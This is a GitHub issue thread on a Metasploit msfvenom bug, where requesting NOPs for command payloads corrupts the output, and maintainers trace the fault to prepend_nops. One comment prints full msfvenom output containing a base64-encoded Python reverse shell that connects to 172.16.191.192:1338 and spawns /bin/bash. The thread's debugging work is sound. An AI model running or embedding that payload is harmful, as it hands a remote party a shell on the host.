### ISSUE TITLE
Msfvenom throws "undefined method 'each_byte'" if nopsled, cmd/unix/generic payload and python formats are used

### ISSUE THREAD

**Issue by henryreed** [rapid7/metasploit-framework#15772]
![image](https://user-images.githubusercontent.com/60915078/137582126-8371a3af-71e5-44ae-8329-1a1d81efded7.png)

## Steps to reproduce

1. Run `msfvenom -p cmd/unix/generic CMD="/bin/bash" -f python -n 100`

This error occurs on the latest version of Kali Linux 2021.3:
```
┌──(kali㉿kali)-[~]
└─$ grep ID= /etc/os-release
ID=kali
VERSION_ID="2021.3"
                                                                                                                                                                       
┌──(kali㉿kali)-[~]
└─$ sudo apt update && sudo apt full-upgrade -y
Hit:1 http://kali.download/kali kali-rolling InRelease
Reading package lists... Done
Building dependency tree... Done
Reading state information... Done
All packages are up to date.
Reading package lists... Done
Building dependency tree... Done
Reading state information... Done
Calculating upgrade... Done
0 upgraded, 0 newly installed, 0 to remove and 0 not upgraded.

┌──(kali㉿kali)-[~]
└─$ timedatectl | grep Universal
           Universal time: Sat 2021-10-16 10:25:40 UTC
```

## Expected behavior

A buf variable similar to the image below but with a nop sled of 100 characters.

![image](https://user-images.githubusercontent.com/60915078/137583670-a787d1ee-9984-4d9a-8700-c33c4995a496.png)

## Current behavior

The software crashes with an error, which forces me to manually add a nop sled :cry: 

Please see the error in the screenshot at the top of this post, also copy pasted for your convenience in the text below:
```
Error: undefined method `each_byte' for #<Array:0x00007f89860482d0>
Did you mean?  each_entry
```

### Metasploit version

```
┌──(kali㉿kali)-[~]
└─$ msfconsole --version                                      
Framework Version: 6.1.8-dev
```

## Additional information

Not sure if this is related and also unsure if this is intentional, but if I don't give any format this is what msfvenom spits out:
```
┌──(kali㉿kali)-[~]                                                                                                                                                    
└─$ msfvenom  -p cmd/unix/generic CMD="/bin/bash" -n 100                                                                                                               
[-] No platform was selected, choosing Msf::Module::Platform::Unix from the payload                                                                                    
[-] No arch selected, selecting arch: cmd from the payload                                                                                                             
No encoder specified, outputting raw payload                                                                                                                           
Payload size: 10 bytes                                                                                                                                                 
[["x86/single_byte", Msf::Modules::Nop__X86__Single_byte::MetasploitModule], ["x86/opty2", Msf::Modules::Nop__X86__Opty2::MetasploitModule], ["x64/simple", Msf::Module
s::Nop__X64__Simple::MetasploitModule], ["tty/generic", Msf::Modules::Nop__Tty__Generic::MetasploitModule], ["sparc/random", Msf::Modules::Nop__Sparc__Random::Metasplo
itModule], ["ppc/simple", Msf::Modules::Nop__Ppc__Simple::MetasploitModule], ["php/generic", Msf::Modules::Nop__Php__Generic::MetasploitModule], ["mipsbe/better", Msf:
:Modules::Nop__Mipsbe__Better::MetasploitModule], ["armle/simple", Msf::Modules::Nop__Armle__Simple::MetasploitModule], ["aarch64/simple", Msf::Modules::Nop__Aarch64__
Simple::MetasploitModule]]
```

The number of nop sled characters requested does not change the output above. I also haven't tried every single format, but it does appear that at least `c` and `python` cause the same error.

**Comment by henryreed** [comment]
@bcoles I apologize--that was my late night training binge clouding my judgement. I somehow used `cmd/unix/generic`, got that error, typed up the whole bug report, then went back and used `linux/x86/exec` without making the connection that I initially used the wrong payload.

Considering this, the expected behavior should be `msfvenom` saying that a nop sled should not be used with `cmd/unix/generic`. Hopefully if folk run into that they'll realize they're using the wrong payload.

**Comment by bcoles** [comment]
> 
> 
> I've used whitespace as a "NOP sled" for command payloads before. Maybe we can add something like that.

The unix cmd reverse python payload has some lame randomised whitespace obfuscation, but it is custom. It is not integrated with the payload mixin options (nops, encoders, advanced options, ...). I'm not sure if other unix cmd payloads have anything similar.

Ideally cmd payload nops should obey a consistent payload/mixin option with a method to generate "safe" nops.

**Comment by bcoles** [comment]
Ok so there's another bug here. It wasn't hit in the OP because using `-f python` followed a different code path.

Specifying nops with `-n` causes `prepend_nops(raw_payload)` to clobber the generated payload with an array.

This diff shows where it happens:

```diff
diff --git a/lib/msf/core/payload_generator.rb b/lib/msf/core/payload_generator.rb
index 3465ac60c8..da63ec3724 100644
--- a/lib/msf/core/payload_generator.rb
+++ b/lib/msf/core/payload_generator.rb
@@ -430,6 +430,7 @@ module Msf
         if padnops
           @nops = nops - raw_payload.length
         end
+        puts raw_payload
         raw_payload = prepend_nops(raw_payload)
         gen_payload = format_payload(raw_payload)
       end
```

Note that the payload is printed correctly (due to diff above), but after the call to `prepend_nops` the payload size is "10 bytes" (lol) and the final payload is an array cast to string `[["x86/single_byte", Msf::Modules::Nop__X86__Single_byte::MetasploitModule], ...`.

```
# ./msfvenom -n 100 -p cmd/unix/reverse_python "LHOST=172.16.191.192" LPORT=1338 R
/usr/lib/ruby/2.7.0/timeout.rb:50: warning: already initialized constant Timeout::THIS_FILE
/var/lib/gems/2.7.0/gems/timeout-0.2.0/lib/timeout.rb:53: warning: previous definition of THIS_FILE was here
/usr/lib/ruby/2.7.0/timeout.rb:51: warning: already initialized constant Timeout::CALLER_OFFSET
/var/lib/gems/2.7.0/gems/timeout-0.2.0/lib/timeout.rb:54: warning: previous definition of CALLER_OFFSET was here
[-] No platform was selected, choosing Msf::Module::Platform::Unix from the payload
[-] No arch selected, selecting arch: cmd from the payload
No encoder specified, outputting raw payload
python -c "exec(__import__('base64').b64decode(__import__('codecs').getencoder('utf-8')('aW1wb3J0IHNvY2tldCAgICAsc3VicHJvY2VzcyAgICAsb3MgOyAgICAgIGhvc3Q9IjE3Mi4xNi4xOTEuMTkyIiA7ICAgICAgcG9ydD0xMzM4IDsgICAgICBzPXNvY2tldC5zb2NrZXQoc29ja2V0LkFGX0lORVQgICAgLHNvY2tldC5TT0NLX1NUUkVBTSkgOyAgICAgIHMuY29ubmVjdCgoaG9zdCAgICAscG9ydCkpIDsgICAgICBvcy5kdXAyKHMuZmlsZW5vKCkgICAgLDApIDsgICAgICBvcy5kdXAyKHMuZmlsZW5vKCkgICAgLDEpIDsgICAgICBvcy5kdXAyKHMuZmlsZW5vKCkgICAgLDIpIDsgICAgICBwPXN1YnByb2Nlc3MuY2FsbCgiL2Jpbi9iYXNoIik=')[0]))"
Payload size: 10 bytes
[["x86/single_byte", Msf::Modules::Nop__X86__Single_byte::MetasploitModule], ["x86/opty2", Msf::Modules::Nop__X86__Opty2::MetasploitModule], ["x64/simple", Msf::Modules::Nop__X64__Simple::MetasploitModule], ["tty/generic", Msf::Modules::Nop__Tty__Generic::MetasploitModule], ["sparc/random", Msf::Modules::Nop__Sparc__Random::MetasploitModule], ["ppc/simple", Msf::Modules::Nop__Ppc__Simple::MetasploitModule], ["php/generic", Msf::Modules::Nop__Php__Generic::MetasploitModule], ["mipsbe/better", Msf::Modules::Nop__Mipsbe__Better::MetasploitModule], ["armle/simple", Msf::Modules::Nop__Armle__Simple::MetasploitModule], ["aarch64/simple", Msf::Modules::Nop__Aarch64__Simple::MetasploitModule]]
```

This is due to an oversight in `prepend_nops` where it is possible to not `return`, causing the array of Nop objects to be returned instead.

https://github.com/rapid7/metasploit-framework/blob/7d3bff66f04501bfa6a3114c56b05ebe849314cf/lib/msf/core/payload_generator.rb#L546-L563

I've added a `nops/generic/cmd` Nop module which uses whitespace padding in #16113. This resolves @wvu 's suggestion above (https://github.com/rapid7/metasploit-framework/issues/15772#issuecomment-945849267) of using whitespace padding.

This also resolves the issues with msfvenom, which now supports generating `ARCH_CMD` command payloads with `-n` and `--pad-nops`.

However, `lib/msf/core/payload_generator.rb` should still be updated to prevent falling through the loop without returning in the event that the payload `ARCH` does not have any associated Nops. (ie, when `framework.nops.each_module_ranked('Arch' => [arch])` fails to return).

**Comment by bcoles** [comment]
> However, `lib/msf/core/payload_generator.rb` should still be updated to prevent falling through the loop without returning in the event that the payload `ARCH` does not have any associated Nops. (ie, when `framework.nops.each_module_ranked('Arch' => [arch])` fails to return).

This is addressed in PR #16114 by returning the raw shellcode unmodified in the event that there are no Nops modules for the target payload architecture.
